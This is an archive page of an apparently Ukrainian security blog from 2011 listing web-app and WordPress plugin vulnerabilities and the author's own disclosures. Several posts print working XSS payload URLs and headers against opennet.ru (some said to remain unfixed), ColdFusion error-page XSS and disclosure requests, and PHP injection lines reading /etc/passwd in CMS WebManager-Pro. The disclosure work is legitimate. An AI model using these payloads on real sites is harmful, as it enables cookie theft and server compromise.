Архів для категорії 'Уразливості'

Уразливості в плагінах для WordPress №27

23:52 02.02.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Powerhouse Museum Collection Image Grid, oQey-Gallery та Feature Slideshow. Для котрих з’явилися експлоіти. Powerhouse Museum Collection Image Grid - це плагін для включення прев’юшек та описів об’єктів з колекції Powerhouse Museum, oQey-Gallery - це плагін для створення фото галерей і слайдшоу, Feature Slideshow - це плагін для створення слайдшоу з вибраних записів або сторінок.

  • WordPress Powerhouse Museum Collection Image Grid 0.9.1.1 Cross Site Scripting (деталі)
  • WordPress oQey-Gallery 0.2 Cross Site Scripting (деталі)
  • WordPress Feature Slideshow 1.0.6-beta Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

18:28 02.02.2011

В даній добірці уразливості в веб додатках:

  • Cisco Small Business Video Surveillance Cameras and Cisco 4-Port Gigabit Security Routers Authentication Bypass Vulnerability (деталі)
  • XSRF (CSRF) in Zimplit (деталі)
  • HP TestDirector for Quality Center running on AIX, Linux and Solaris, Remote Unauthorized Access (деталі)
  • Mako vulnerability (деталі)
  • Netgear WG602v4 Saved Pass Stack Overflow (деталі)
  • JE Guestbook 1.0 Joomla Component Multiple Remote Vulnerabilities (деталі)
  • Contact Form Generator (EditFormLite) SQL Injection Vulnerability (деталі)
  • Wget vulnerability (деталі)
  • NetWin Surgemail XSS vulnerability (деталі)
  • Netbiter webSCADA multiple vulnerabilities (деталі)

Уразливості на n-change.net

15:07 01.02.2011

16.06.2010

У листопаді, 08.11.2009, я знайшов Cross-Site Scripting уразливості на проекті http://n-change.net (обмінник веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно обмінників веб грошей я писав про уразливості на exwp.com.

Детальна інформація про уразливості з’явиться пізніше.

01.02.2011

XSS:

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №26

23:52 31.01.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Featured Post With Thumbnail, RSS Feed Reader For WordPress та Recip.ly Plugin. Для котрих з’явилися експлоіти. WP Featured Post With Thumbnail - це плагін для виведення рекомендованих записів, RSS Feed Reader For WordPress - це плагін для виведення RSS фідів у вигляді HTML, Recip.ly Plugin - це плагін для роботи з рецептами.

  • WordPress WP Featured Post With Thumbnail 3.0 Cross Site Scripting (деталі)
  • WordPress RSS Feed Reader For WordPress 0.1 Cross Site Scripting (деталі)
  • WordPress Recip.ly Plugin 1.1.7 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

15:22 31.01.2011

В даній добірці уразливості в веб додатках:

  • IBM BladeCenter Management Module - DoS vulnerability (деталі)
  • SQL injection vulnerability in Entrans (деталі)
  • XSS vulnerability in Entrans (деталі)
  • SQL injection vulnerability in e107 (деталі)
  • Unauthenticated Filesystem Access in iomega Home Media Network Hard Drive (деталі)
  • 2.6.6 <= phpMyFAQ <= 2.6.8 XSS (деталі)
  • XSS vulnerability in Pluck (деталі)
  • XSS vulnerability in GetSimple CMS (деталі)
  • Various XSS and information disclosure flaws within 3Com iMC (Intelligent Management Center) (деталі)
  • Unauthenticated File Retrieval (traversal) within 3Com iMC (Intelligent Management Center) (деталі)

Уразливості в плагінах для WordPress №25

23:54 29.01.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Uploader, x7Host’s Videox7 UGC та WP Publication Archive. Для котрих з’явилися експлоіти. WordPress Uploader - це плагін для завантаження файлів, x7Host’s Videox7 UGC - це плагін для розміщення відео на сайті, WP Publication Archive - це плагін для завантаження та управління публікаціями.

  • WordPress Uploader 1.0.0 Cross Site Scripting (деталі)
  • WordPress x7Host’s Videox7 UGC Plugin 2.5.3.2 Cross Site Scripting (деталі)
  • WordPress WP Publication Archive 2.0.1 Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

RCE та CSRF уразливості в CMS WebManager-Pro

15:10 29.01.2011

19.11.2010

У серпні, 03.08.2010, я знайшов Remote Code Execution та Cross-Site Request Forgery уразливості в CMS WebManager-Pro. Дані уразливості я виявив на різних сайтах на CMS WebManager-Pro від FGS_Studio. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS WebManager-Pro.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

29.01.2011

RCE (Remote PHP Code Execution):

В cистемі можливе включення php тегів безпосередньо в поля для текста контенту. Таким чином на будь-яку сторінку (в полі “Текст”) можна включити php код, який виконається при відвіданні сторінки. Атаку можна провести при доступі до адмінки, або при CSRF-атаці на адміна.

PHP код задається наступним чином:

<?php include "/etc/passwd"; php?>
<?php include "script.php"; php?>

CSRF:

В edit_content.php не перевіряється джерело запиту, що дозволяє проводити CSRF атаки для зміни контенту будь-якої сторінки сайта. Що також може бути використано для проведення persistent XSS атак та для віддаленого виконання коду (RCE).

Уразливі CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.

Добірка уразливостей

15:14 28.01.2011

В даній добірці уразливості в веб додатках:

  • Sun Java JDK/JRE AWT Library Invalid Pointer Vulnerability (деталі)
  • Sun Java JDK/JRE AWT Library Invalid Index Vulnerability (деталі)
  • Sun Java JDK/JRE Soundbank Resource Parsing Buffer Overflow (деталі)
  • XSS in Horde IMP <=4.3.7, fetchmailprefs.php (деталі)
  • FreePBX recordings interface allows remote code execution (деталі)
  • Sun Java JDK/JRE Soundbank Resource Name Buffer Overflow (деталі)
  • Oracle Java Runtime Environment Image FIle Buffer Overflow Vulnerability (деталі)
  • SQL Injection and XSS in Motorito < v2.0 Ni 483 (деталі)
  • CollabNet Subversion Edge Log Parser XSS/Code Injection Vulnerability (деталі)
  • SQL injection vulnerability in Entrans (деталі)

Уразливості в Adobe ColdFusion

23:53 27.01.2011

В 2008 - 2010 роках я знаходив уразливості на багатьох сайтах на ColdFusion. Це SQL DB Structure Extraction, Full path disclosure та Cross-Site Scripting уразливості. В останнє я виявив подібні уразливості на www.sec.ru.

Вони мають місце на сторінці детального повідомлення про помилку (що часто виводиться на ColdFusion сайтах). І враховуючи те, що ці дірки відносяться до Adobe ColdFusion, 16.11.2010 я приватно повідомив про це Adobe, але вони проігнорували моє повідомлення. Тому я оприлюднюю детальну інформацію про уразливості.

SQL DB Structure Extraction:

http://site/page.cfm?id=-

Виводиться інформація про SQL запит (якщо даний веб додаток працює з СУБД).

Full path disclosure:

http://site/page.cfm?id=-

Виводиться повний шлях на сервері.

XSS:

При запиті до сторінки http://site/page.cfm?id=- з User-Agent “Mozilla<body onload=alert(document.cookie)>” можна було виконати код. Уразливість працювала в 2009 та 25.02.2010, зараз вона вже виправлена (вірогідно в останніх версіях ColdFusion).

XSS:

http://site/page.cfm?id=%3Cbody%20onload=alert(document.cookie)%3E

Вектор через тег script, що працював в 2009 та 25.02.2010, вже виправили в останніх версіях ColdFusion, але можна атакувати через багато інших векторів (наприклад, через тег body).

Уразливі потенційно всі версії Adobe ColdFusion.

Нові уразливості на www.opennet.ru

15:29 27.01.2011

14.06.2010

У листопаді, 05.11.2009, я знайшов Cross-Site Scripting уразливості (в тому числі persistent XSS) на секюріті проекті http://www.opennet.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на opennet.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.01.2011

XSS (persistent):

При доступі на сторінку http://www.opennet.ru /cgi-bin/opennet/bookmark.cgi?submit=add з заголовком:

Referer: http://www.opennet.ru/"><script>alert(document.cookie)</script>

Або через GET запит:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=http://www.opennet.ru/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує одразу, а також при заході на сторінку http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

Дані уразливості вже виправлені, але даний захист можна обійти використовуючи наступну Strictly social XSS:

Strictly social persistent XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=javascript:alert(document.cookie)//http://opennet.ru&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8

Сберігається “закладка” (для даного користувача). Код спрацьовує при кліку на сторінці http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.

XSS:

http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

З даних уразливостей все ще не всі виправлені.